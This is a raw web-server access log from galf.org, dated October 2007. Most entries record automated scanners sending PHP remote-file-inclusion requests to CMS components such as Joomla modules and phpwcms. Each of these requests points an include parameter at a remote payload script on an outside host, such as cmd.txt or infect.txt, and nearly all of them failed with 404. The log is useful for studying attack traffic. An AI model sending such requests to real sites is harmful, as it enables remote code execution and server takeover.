67.59.185.50 - - [15/Oct/2007:12:00:02 -0700] "GET /logs/access_070826.log/index.php?page=uid=48(apache)%20gid=48(apache)%20groups=48(apache),2523(psaserv)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
67.59.185.50 - - [15/Oct/2007:12:00:03 -0700] "GET /index.php?page=uid=48(apache)%20gid=48(apache)%20groups=48(apache),2523(psaserv)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
67.59.185.50 - - [15/Oct/2007:12:00:03 -0700] "GET /logs/index.php?page=uid=48(apache)%20gid=48(apache)%20groups=48(apache),2523(psaserv)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
67.59.185.50 - - [15/Oct/2007:12:00:06 -0700] "GET /logs/access_070826.log/index.php?page=uid=48(apache)%20gid=48(apache)%20groups=48(apache),2523(psaserv)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
67.59.185.50 - - [15/Oct/2007:12:00:06 -0700] "GET /index.php?page=uid=48(apache)%20gid=48(apache)%20groups=48(apache),2523(psaserv)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
67.59.185.50 - - [15/Oct/2007:12:00:06 -0700] "GET /logs/index.php?page=uid=48(apache)%20gid=48(apache)%20groups=48(apache),2523(psaserv)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
65.55.208.231 - - [15/Oct/2007:12:00:07 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.208.231 - - [15/Oct/2007:12:00:07 -0700] "GET /tmp/?S=D HTTP/1.0" 200 504 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
72.3.253.107 - - [15/Oct/2007:12:00:09 -0700] "GET /logs/access_070826.log/index.php?page=uid=48(apache)%20gid=48(apache)%20groups=48(apache),2522(psaserv)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
72.3.253.107 - - [15/Oct/2007:12:00:09 -0700] "GET /index.php?page=uid=48(apache)%20gid=48(apache)%20groups=48(apache),2522(psaserv)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
72.3.253.107 - - [15/Oct/2007:12:00:09 -0700] "GET /logs/index.php?page=uid=48(apache)%20gid=48(apache)%20groups=48(apache),2522(psaserv)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
217.71.208.150 - - [15/Oct/2007:12:00:28 -0700] "GET /logs/access_070910.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://amsterdam4.interfree.it/d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
194.95.188.39 - - [15/Oct/2007:12:01:13 -0700] "GET /logs/index1.php?x=http://www.wsteam.net/infect.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
194.95.188.39 - - [15/Oct/2007:12:01:14 -0700] "GET /index1.php?x=http://www.wsteam.net/infect.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
194.95.188.39 - - [15/Oct/2007:12:01:14 -0700] "GET /logs/index1.php?x=http://www.wsteam.net/infect.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
194.95.188.39 - - [15/Oct/2007:12:01:15 -0700] "GET /index1.php?x=http://www.wsteam.net/infect.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
153.39.147.187 - - [15/Oct/2007:12:01:29 -0700] "GET /logs/access_070702.log HTTP/1.1" 200 769904 "http://www.galf.org/" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.12) Gecko/20070718 Fedora/1.5.0.12-4.fc6 Firefox/1.5.0.12" "www.galf.org"
153.39.147.187 - - [15/Oct/2007:12:01:29 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.12) Gecko/20070718 Fedora/1.5.0.12-4.fc6 Firefox/1.5.0.12" "www.galf.org"
153.39.147.187 - - [15/Oct/2007:12:01:29 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.12) Gecko/20070718 Fedora/1.5.0.12-4.fc6 Firefox/1.5.0.12" "www.galf.org"
153.39.147.187 - - [15/Oct/2007:12:01:38 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.12) Gecko/20070718 Fedora/1.5.0.12-4.fc6 Firefox/1.5.0.12" "www.galf.org"
81.169.169.185 - - [15/Oct/2007:12:02:00 -0700] "GET /logs/access_070910.log//components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://prvib.braindead.hu/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
85.190.1.12 - - [15/Oct/2007:12:02:02 -0700] "GET /logs/access_070910.log//components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://prvib.braindead.hu/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
85.190.1.12 - - [15/Oct/2007:12:02:02 -0700] "GET //components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://prvib.braindead.hu/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
85.190.1.12 - - [15/Oct/2007:12:02:02 -0700] "GET /logs//components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://prvib.braindead.hu/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
81.169.169.185 - - [15/Oct/2007:12:02:09 -0700] "GET /logs/access_070820.log//components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://prvib.braindead.hu/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
85.190.1.12 - - [15/Oct/2007:12:02:19 -0700] "GET /logs/access_070820.log//components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://prvib.braindead.hu/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
62.141.48.120 - - [15/Oct/2007:12:02:36 -0700] "GET /logs/access_070826.log//administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.wsteam.net/infect.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
85.214.37.37 - - [15/Oct/2007:12:03:24 -0700] "GET /program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://www.lea-soins-palliatifs.org/importantissimoscanphpmic22.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.galf.org"
85.214.37.37 - - [15/Oct/2007:12:03:24 -0700] "GET /logs/program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://www.lea-soins-palliatifs.org/importantissimoscanphpmic22.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.galf.org"
216.14.208.109 - - [15/Oct/2007:12:03:52 -0700] "GET /logs/access_071001.log/modules/xgallery/upgrade_album.php?=http://almarhum.net/infect.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
81.91.236.2 - - [15/Oct/2007:12:03:54 -0700] "GET /phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://amyru.h18.ru/images/cs.txt? HTTP/1.1" 404 275 "http://www.altavista.com/web/results?itag=ody&kgs=1&kls=0&q=search&stq=0" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.7.7) Gecko/2006031 Firefox/2.0.0" "www.galf.org"
81.91.236.2 - - [15/Oct/2007:12:03:54 -0700] "GET /phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://amyru.h18.ru/images/cs.txt? HTTP/1.1" 404 275 "http://www.altavista.com/web/results?itag=ody&kgs=1&kls=0&q=search&stq=0" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.7.7) Gecko/2006031 Firefox/2.0.0" "www.galf.org"
212.241.198.145 - - [15/Oct/2007:12:04:02 -0700] "GET /logs/access.log/components/com_simpleboard/image_upload.php?sbp=http://fastquickauctions.com/uploaded/cache/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
212.241.198.145 - - [15/Oct/2007:12:04:02 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://fastquickauctions.com/uploaded/cache/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
212.227.21.229 - - [15/Oct/2007:12:04:03 -0700] "GET /logs/access.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=uid=30(wwwrun)%20gid=8(www)%20groups=8(www),2523(psaserv)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
212.227.21.229 - - [15/Oct/2007:12:04:03 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=uid=30(wwwrun)%20gid=8(www)%20groups=8(www),2523(psaserv)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
212.227.21.229 - - [15/Oct/2007:12:04:03 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=uid=30(wwwrun)%20gid=8(www)%20groups=8(www),2523(psaserv)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
68.180.250.80 - - [15/Oct/2007:12:04:03 -0700] "GET /logs/access_070730.log HTTP/1.0" 200 524288 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
62.141.48.120 - - [15/Oct/2007:12:04:04 -0700] "GET /logs/access_070827.log//administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.wsteam.net/infect.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
212.227.21.229 - - [15/Oct/2007:12:04:06 -0700] "GET /logs/access_070903.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=uid=30(wwwrun)%20gid=8(www)%20groups=8(www),2523(psaserv)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
153.39.147.187 - - [15/Oct/2007:12:04:27 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.12) Gecko/20070718 Fedora/1.5.0.12-4.fc6 Firefox/1.5.0.12" "www.galf.org"
68.187.13.26 - - [15/Oct/2007:12:04:43 -0700] "GET /logs/access_071001.log/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://brendonmorris.co.za/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
68.187.13.26 - - [15/Oct/2007:12:04:43 -0700] "GET /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://brendonmorris.co.za/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
68.187.13.26 - - [15/Oct/2007:12:04:44 -0700] "GET /logs/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://brendonmorris.co.za/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
194.95.188.39 - - [15/Oct/2007:12:06:21 -0700] "GET /logs/access_070826.log//administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.wsteam.net/infect.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
212.241.198.145 - - [15/Oct/2007:12:06:56 -0700] "GET /logs/access.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://futurehousingsystems.com/images/string.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
212.241.198.145 - - [15/Oct/2007:12:06:56 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://futurehousingsystems.com/images/string.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
212.241.198.145 - - [15/Oct/2007:12:06:57 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://futurehousingsystems.com/images/string.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
194.95.188.39 - - [15/Oct/2007:12:08:03 -0700] "GET /logs/access_070827.log//administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.wsteam.net/infect.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.14.208.109 - - [15/Oct/2007:12:08:08 -0700] "GET /logs/access.log/modules/xgallery/upgrade_album.php?=http://almarhum.net/infect.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
212.227.21.229 - - [15/Oct/2007:12:08:24 -0700] "GET /logs/access_070820.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=uid=30(wwwrun)%20gid=8(www)%20groups=8(www),2523(psaserv)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
212.227.21.229 - - [15/Oct/2007:12:08:24 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=uid=30(wwwrun)%20gid=8(www)%20groups=8(www),2523(psaserv)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
212.227.21.229 - - [15/Oct/2007:12:08:25 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=uid=30(wwwrun)%20gid=8(www)%20groups=8(www),2523(psaserv)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
217.30.180.53 - - [15/Oct/2007:12:08:35 -0700] "GET /phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://amyru.h18.ru/images/cs.txt? HTTP/1.1" 404 275 "http://www.altavista.com/web/results?itag=ody&kgs=1&kls=0&q=search&stq=0" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.7.7) Gecko/2006031 Firefox/2.0.0" "www.galf.org"
217.30.180.53 - - [15/Oct/2007:12:08:37 -0700] "GET /phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://amyru.h18.ru/images/cs.txt? HTTP/1.1" 404 275 "http://www.altavista.com/web/results?itag=ody&kgs=1&kls=0&q=search&stq=0" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.7.7) Gecko/2006031 Firefox/2.0.0" "www.galf.org"
217.30.180.53 - - [15/Oct/2007:12:08:39 -0700] "GET /phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://amyru.h18.ru/images/cs.txt? HTTP/1.1" 404 275 "http://www.altavista.com/web/results?itag=ody&kgs=1&kls=0&q=search&stq=0" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.7.7) Gecko/2006031 Firefox/2.0.0"
212.241.198.145 - - [15/Oct/2007:12:08:52 -0700] "GET /logs/access_070820.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://futurehousingsystems.com/images/string.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
212.241.198.145 - - [15/Oct/2007:12:08:52 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://futurehousingsystems.com/images/string.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
212.241.198.145 - - [15/Oct/2007:12:08:53 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://futurehousingsystems.com/images/string.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
83.15.229.170 - - [15/Oct/2007:12:09:41 -0700] "GET /logs/access.log//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.waldemarnowakowski.com/chat/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.15.229.170 - - [15/Oct/2007:12:09:41 -0700] "GET //administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.waldemarnowakowski.com/chat/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.15.229.170 - - [15/Oct/2007:12:09:42 -0700] "GET /logs//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.waldemarnowakowski.com/chat/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.15.229.170 - - [15/Oct/2007:12:09:52 -0700] "GET /logs/access_070924.log//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.waldemarnowakowski.com/chat/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
212.227.21.229 - - [15/Oct/2007:12:09:59 -0700] "GET /logs/access_070826.log/program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=uid=30(wwwrun)%20gid=8(www)%20groups=8(www),2523(psaserv)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
212.227.21.229 - - [15/Oct/2007:12:09:59 -0700] "GET /program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=uid=30(wwwrun)%20gid=8(www)%20groups=8(www),2523(psaserv)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
212.227.21.229 - - [15/Oct/2007:12:10:00 -0700] "GET /logs/program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=uid=30(wwwrun)%20gid=8(www)%20groups=8(www),2523(psaserv)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
62.141.48.120 - - [15/Oct/2007:12:10:23 -0700] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.wsteam.net/infect.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
62.141.48.120 - - [15/Oct/2007:12:10:24 -0700] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.wsteam.net/infect.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
218.153.150.7 - - [15/Oct/2007:12:10:42 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.153.150.7 - - [15/Oct/2007:12:10:42 -0700] "GET //skin/zero_vote/error.php?dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.153.150.7 - - [15/Oct/2007:12:10:43 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
218.153.150.7 - - [15/Oct/2007:12:10:44 -0700] "GET //skin/zero_vote/error.php?dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
209.35.191.105 - - [15/Oct/2007:12:11:14 -0700] "GET /logs//customer/product.php?http://usuarios.arnet.com.ar/larry123/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
209.35.191.105 - - [15/Oct/2007:12:11:15 -0700] "GET //customer/product.php?http://usuarios.arnet.com.ar/larry123/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
209.35.191.105 - - [15/Oct/2007:12:11:15 -0700] "GET /logs//customer/product.php?http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
209.35.191.105 - - [15/Oct/2007:12:11:16 -0700] "GET //customer/product.php?http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
209.35.191.105 - - [15/Oct/2007:12:11:27 -0700] "GET /logs//customer/product.php?http://usuarios.arnet.com.ar/larry123/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
209.35.191.105 - - [15/Oct/2007:12:11:27 -0700] "GET //customer/product.php?http://usuarios.arnet.com.ar/larry123/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
153.39.147.187 - - [15/Oct/2007:12:11:50 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.12) Gecko/20070718 Fedora/1.5.0.12-4.fc6 Firefox/1.5.0.12" "www.galf.org"
194.95.188.39 - - [15/Oct/2007:12:12:03 -0700] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.wsteam.net/infect.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
194.95.188.39 - - [15/Oct/2007:12:12:03 -0700] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.wsteam.net/infect.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.25.64.233 - - [15/Oct/2007:12:12:23 -0700] "GET /logs/access_070820.log/program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://futurehousingsystems.com/images/string.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.25.64.233 - - [15/Oct/2007:12:12:23 -0700] "GET /program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://futurehousingsystems.com/images/string.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.25.64.233 - - [15/Oct/2007:12:12:23 -0700] "GET /logs/program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://futurehousingsystems.com/images/string.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
209.35.191.103 - - [15/Oct/2007:12:12:30 -0700] "GET /logs//customer/product.php?http://usuarios.arnet.com.ar/larry123/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
209.35.191.103 - - [15/Oct/2007:12:12:30 -0700] "GET //customer/product.php?http://usuarios.arnet.com.ar/larry123/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
209.35.191.103 - - [15/Oct/2007:12:12:31 -0700] "GET /logs//customer/product.php?http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64"
209.35.191.103 - - [15/Oct/2007:12:12:32 -0700] "GET //customer/product.php?http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
85.25.64.233 - - [15/Oct/2007:12:12:34 -0700] "GET /logs/access_070806.log/program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://futurehousingsystems.com/images/string.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
153.39.147.187 - - [15/Oct/2007:12:12:41 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.12) Gecko/20070718 Fedora/1.5.0.12-4.fc6 Firefox/1.5.0.12" "www.galf.org"
66.70.216.33 - - [15/Oct/2007:12:12:59 -0700] "GET /phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://amyru.h18.ru/images/cs.txt? HTTP/1.1" 404 275 "http://www.altavista.com/web/results?itag=ody&kgs=1&kls=0&q=search&stq=0" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.7.7) Gecko/2006031 Firefox/2.0.0" "www.galf.org"
81.169.134.8 - - [15/Oct/2007:12:13:12 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.candanfanclub.com/cache/inf.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.169.134.8 - - [15/Oct/2007:12:13:12 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.candanfanclub.com/cache/inf.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.37.230 - - [15/Oct/2007:12:13:28 -0700] "GET /logs/access_070709.log//modules/4nAlbum/public/displayCategory.php?basepath=http://scumbag.blink-182.de/pics/pics/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.37.230 - - [15/Oct/2007:12:13:28 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://scumbag.blink-182.de/pics/pics/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.37.230 - - [15/Oct/2007:12:13:28 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://scumbag.blink-182.de/pics/pics/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
218.153.150.7 - - [15/Oct/2007:12:13:38 -0700] "GET //login.php?dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
194.204.11.65 - - [15/Oct/2007:12:13:48 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://ownz-you.com/kiddies/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
212.241.198.145 - - [15/Oct/2007:12:14:13 -0700] "GET /logs/access_070820.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://futurehousingsystems.com/images/string.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.141.39.43 - - [15/Oct/2007:12:14:13 -0700] "GET /logs/access_070730.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
62.141.39.43 - - [15/Oct/2007:12:14:27 -0700] "GET /logs/access_070730.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
85.214.37.230 - - [15/Oct/2007:12:14:37 -0700] "GET /logs/access_070709.log//modules/4nAlbum/public/displayCategory.php?basepath=http://scumbag.blink-182.de/pics/pics/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
85.214.37.230 - - [15/Oct/2007:12:14:38 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://scumbag.blink-182.de/pics/pics/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.37.230 - - [15/Oct/2007:12:14:38 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://scumbag.blink-182.de/pics/pics/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.227.21.229 - - [15/Oct/2007:12:15:52 -0700] "GET /logs/access_070820.log/program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=uid=30(wwwrun)%20gid=8(www)%20groups=8(www),2523(psaserv)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
153.39.147.187 - - [15/Oct/2007:12:16:00 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.12) Gecko/20070718 Fedora/1.5.0.12-4.fc6 Firefox/1.5.0.12" "www.galf.org"
59.105.190.105 - - [15/Oct/2007:12:16:31 -0700] "GET /logs/access_070903.log/components/com_lmo/lmo.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
59.105.190.105 - - [15/Oct/2007:12:16:32 -0700] "GET /components/com_lmo/lmo.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
59.105.190.105 - - [15/Oct/2007:12:16:32 -0700] "GET /logs/components/com_lmo/lmo.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
59.105.190.105 - - [15/Oct/2007:12:16:33 -0700] "GET /logs/access_070827.log/components/com_lmo/lmo.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
68.187.13.26 - - [15/Oct/2007:12:17:05 -0700] "GET /logs/access_070827.log//administrator/components/com_webring/admin.webring.docs.php?component_dir=http://brendonmorris.co.za/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
153.39.147.187 - - [15/Oct/2007:12:17:06 -0700] "GET /logs/ HTTP/1.1" 200 5085 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.12) Gecko/20070718 Fedora/1.5.0.12-4.fc6 Firefox/1.5.0.12" "www.galf.org"
